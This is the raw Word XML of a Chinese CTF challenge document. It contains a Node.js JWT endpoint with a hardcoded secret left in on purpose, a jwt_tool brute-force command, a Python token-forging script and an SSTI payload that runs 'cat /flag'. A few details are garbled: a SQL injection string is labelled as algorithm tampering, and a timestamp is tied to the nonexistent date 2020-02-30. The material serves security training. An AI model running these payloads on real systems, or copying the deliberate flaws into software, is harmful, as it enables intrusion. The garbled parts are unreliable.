      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BBADE9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// 漏洞修复：随机化文件名防止覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400B9CCF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const safeFileName = Date.now() + '_' + Math.random().toString(36).slice(2) + path.extname(file.name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B90E3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const uploadPath = path.join(__dirname, 'uploads', safeFileName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D420638" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F55D33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file.mv(uploadPath, (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6805329C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  if (err) return res.status(500).send(err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7376A5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  res.send('文件上传成功！');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B67F7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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F04846" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B115B3A" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E5A9F2" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>// 修复2：安全的文件下载接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB575B7" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>app.get('/download', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0871CE4B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const fileName = req.query.file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1103BA70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if (!fileName) return res.status(400).send('缺少文件名参数');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57140E16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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376D530F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// 漏洞修复：路径遍历防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781843F5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const safeFileName = path.basename(fileName); // 过滤../等字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F40237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const filePath = path.join(__dirname, 'config', safeFileName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D05EDB2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C86DA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// 漏洞修复：文件存在性检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4E3415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if (!fs.existsSync(filePath)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3630F022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  return res.status(404).send('文件不存在');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E790E6A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552AA59D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res.download(filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60205F36" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F17907" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBCD649" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>// 保留JWT漏洞的接口（密钥硬编码+无过期时间）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D759911" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:lastRenderedPageBreak/>
        <w:t>app.post('/generate-token', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E0641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const { username } = req.body;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2C6B9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// 故意保留的漏洞：硬编码密钥且未设置expiresIn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4EA29D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const token = jwt.sign({ user: username }, 'supersecretkey123'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1412B" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t xml:space="preserve">  res.json({ token });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C6E2D" w14:textId="2EEDEA42" w:rsidR="0030699F" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBE2748" w14:textId="7C10F779" w:rsidR="004D52D0" w:rsidRDefault="00640EBB" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501DC56C" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>保留的JWT漏洞说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B9295" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>硬编码密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA32982" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:t>密钥supersecretkey123直接写在代码中，攻击者可通过源码泄露或反编译获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C2FBA" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:t>修复建议：改用环境变量存储密钥（但题目要求保留漏洞）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243FC1B2" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>无过期时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF69C4F" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:t>未设置expiresIn参数，令牌永久有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD769F3" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:t>修复建议：添加{ expiresIn: '1h' }（但题目要求保留漏洞）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720874A7" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>未验证签名算法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497021A7" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:t>未强制指定算法（如algorithm: 'HS256'），可能被篡改为none算法攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC7EE97" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00640EBB" w:rsidRDefault="00640EBB" w:rsidP="00640EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640EBB">
        <w:t>修复建议：明确指定算法（但题目要求保留漏洞）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3876246C" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>典型JWT攻击场景（保留漏洞的利用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27600579" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>密钥爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BEBC50" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B1C3C" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t># 使用jwt_tool爆破弱密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D86F519" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>jwt_tool -t http://target/generate-token -C -d rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75AEFA" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>令牌伪造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C68010" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BDE72" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>import jwt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7601A62F" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>forged_token = jwt.encode(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3851530F" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t xml:space="preserve">    {"user": "admin"}, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC3533" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t xml:space="preserve">    "supersecretkey123",  # 硬编码密钥已知</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1BBB2" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t xml:space="preserve">    algorithm="HS256"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A7128" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E3EF0A" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>print("伪造的管理员令牌:", forged_token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A560E7F" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>算法篡改攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5277235C" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9458C3" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>POST /generate-token HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391E1099" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516F9CAA" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t xml:space="preserve">    "username": "admin' UNION SELECT 'admin'--"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DA12DB" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66122104" w14:textId="77777777" w:rsidR="00A1514C" w:rsidRPr="00A1514C" w:rsidRDefault="00A1514C" w:rsidP="00A1514C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1514C">
        <w:t># 尝试注入修改算法为none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB398B6" w14:textId="77777777" w:rsidR="00640EBB" w:rsidRPr="00A1514C" w:rsidRDefault="00640EBB" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C5E93C" w14:textId="3C9F8DEE" w:rsidR="00BF10CA" w:rsidRDefault="00BF10CA" w:rsidP="00BF10CA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc190815123"/>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>时间管理局的留言板</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="376C9C5E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题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>访问靶机地址发现一个留言板系统，页面底部标注"Powered by Chronos v1.3.3"。尝试发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:lastRenderedPageBreak/>
        <w:t>留言内容仅允许字母数字，但管理员似乎设置了特殊的时间校验机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB79CF6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Hint</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 服务器时间被刻意设置为2020年2月30日</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 观察Cookie中的chrono_token字段变化规律</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D68E8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解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E3019" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>发现Cookie中的chrono_token为MTU4MzAwNDgwMA==，解码为十进制时间戳1583004800（对应2020-02-30）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3008022E" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>利用时间格式漏洞构造2020-02-30的非法时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E48630C" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>修改Cookie为当前真实时间戳base64编码触发SSTI漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C9002" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>构造payload：{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707DEB18" w14:textId="3AD4907E" w:rsidR="006563B5" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="006563B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{Time_1s_4n_1llus10n_7h47}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B0F2D4" w14:textId="55FA20D3" w:rsidR="006563B5" w:rsidRPr="00C97809" w:rsidRDefault="006563B5" w:rsidP="00BF10CA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc190815124"/>
      <w:r w:rsidRPr="00C97809">
        <w:t>消失的开发者</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="04607347" w14:textId="77777777" w:rsidR="006563B5" w:rsidRPr="00C97809" w:rsidRDefault="006563B5" w:rsidP="006563B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>根据GitHub仓库的commit记录（用户devx23），找到被删除的API密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0333307B" w14:textId="77777777" w:rsidR="006563B5" w:rsidRPr="00C97809" w:rsidRDefault="006563B5" w:rsidP="006563B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>侦查路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD78F50" w14:textId="77777777" w:rsidR="006563B5" w:rsidRPr="00C97809" w:rsidRDefault="006563B5" w:rsidP="006563B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>分析.git/logs发现已删除分支：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>git reflog show --all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A1C57C" w14:textId="77777777" w:rsidR="006563B5" w:rsidRPr="00C97809" w:rsidRDefault="006563B5" w:rsidP="006563B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>恢复commit 3a8b7d:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>git checkout 3a8b7d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621F33A" w14:textId="77777777" w:rsidR="006563B5" w:rsidRPr="00C97809" w:rsidRDefault="006563B5" w:rsidP="006563B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>在config.json找到：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>"API_KEY": "CTF{GH1st_C0mm1t_Hunt1ng}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716ED44F" w14:textId="37F6367D" w:rsidR="00C97809" w:rsidRDefault="006563B5" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
